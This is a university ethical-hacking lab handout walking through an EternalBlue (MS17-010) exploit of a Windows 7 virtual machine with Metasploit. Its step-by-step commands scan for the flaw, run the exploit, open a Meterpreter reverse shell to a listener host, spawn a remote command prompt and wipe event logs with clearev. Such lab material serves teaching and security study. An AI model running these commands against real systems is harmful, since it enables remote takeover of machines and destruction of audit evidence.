Title
Write a program for exploiting NetBIOS vulnerability.
Aim
To exploit Windows 7 by using EternalBlue
Theory: NetBIOS (Network Basic Input/Output System) is a program that allows applications
on different computers to communicate within a local area network (LAN). NetBIOS
services also provide vital information about the target and help us uncover the target
architecture, operating system version, and many other things.
NetBIOS provides communication services on local networks.
Metasploit
Metasploit is a penetration testing framework that makes hacking simple. It's an
essential tool for many attackers and defenders.
Metasploit Framework
The basic steps for exploiting a system using the Framework include.
1. Optionally checking whether the intended target system is vulnerable to an
exploit.
2. Choosing and configuring an exploit (code that enters a target system by
taking advantage of one of its bugs; about 900 different exploits
for Windows, Unix/Linux and Mac OS X systems are included).
3. Choosing and configuring a payload (code that will be executed on the target
system upon successful entry; for instance, a remote shell or a VNC server).
Metasploit often recommends a payload that should work.
4. Choosing the encoding technique so that hexadecimal opcodes known as "bad
characters" are removed from the payload, these characters will cause the
exploit to fail.
5. Executing the exploit.
EternalBlue
The worldwide WannaCry Ransomware used this exploit to attack the
unpatched computer on May 12,2017.
17 YCT 512 - Ethical Hacking Fundamentals Lab
Procedure:
Requirements:  Kali Linux
 Windows 7
 Virtual Box
 Metasploit tool
Step-1=> To check ip address of your kali linux virtual machine use terminal prompt
~ ifconfig
Step-2=> To check ip address of the victim machine use cmd prompt
~ipconfig
17 YCT 512 - Ethical Hacking Fundamentals Lab
Step-3=>To use Metasploit use command ~ msfconsole -q
Step-4=>Search for vulnerability ms17_010
17 YCT 512 - Ethical Hacking Fundamentals Lab
Step-5=> Use module 1 ~ auxiliary/scanner/smb/smb_ms17_010
Step-6=> Then after using module use command ~ show options
17 YCT 512 - Ethical Hacking Fundamentals Lab
Step-7=> Set RHOSTS as the victim ip address i.e ~ 10.0.2.6
Step-8 => Use command ~ exploit and check the result.
17 YCT 512 - Ethical Hacking Fundamentals Lab
Step-9=> Now use module 2 ~ exploit/windows/smb/ms17_010_eternalblue
Step-10=> Use Command ~ show options
17 YCT 512 - Ethical Hacking Fundamentals Lab
Step-11=> Use command ~ set RHOST ip address i.e ~ 10.0.2.6
Step-12=>Now we will create a process so use command ~ set process name lsass.exe
17 YCT 512 - Ethical Hacking Fundamentals Lab
Step-13=>Use command ~ show payloads for a list of payloads and use payload
~ windows/meterpreter/reverse_tcp
Step-14=>Now set lhost’s ip address i.e listener host (10.0.2.4)
17 YCT 512 - Ethical Hacking Fundamentals Lab
Step-15=> Final step use command ~ exploit and hit enter
Step-16=> Check the status of attack this figure show win means attack is successful…
17 YCT 512 - Ethical Hacking Fundamentals Lab
Step-17=>After the attack is successful, we have full control on victim’s machine so we can use
command ~ sysinfo to get info regarding the built….
Step-18=>In meterpreter shell we can use a command ~ getuid to now the user’s identity
17 YCT 512 - Ethical Hacking Fundamentals Lab
Step-19=> Using meterpreter shell we can also check the process that we had created in step
12 which is running victim’s machine…
Step-20=>We can also use the command prompt of the victim’s machine using command ~ execute -f
cmd.exe -i -H
17 YCT 512 - Ethical Hacking
Fundamentals Lab
Step-21=>With the use of command prompt we can open notepad
remotely and can also delete windows logs using command ~ clearev
Step-22=> This image shows that notepad was opened remotely…